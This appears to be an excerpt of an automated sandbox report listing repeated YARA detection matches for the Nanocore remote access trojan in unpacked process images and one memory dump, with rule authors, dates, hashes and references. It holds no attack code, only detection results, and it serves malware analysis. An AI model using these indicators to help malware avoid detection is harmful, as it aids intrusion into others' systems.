Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
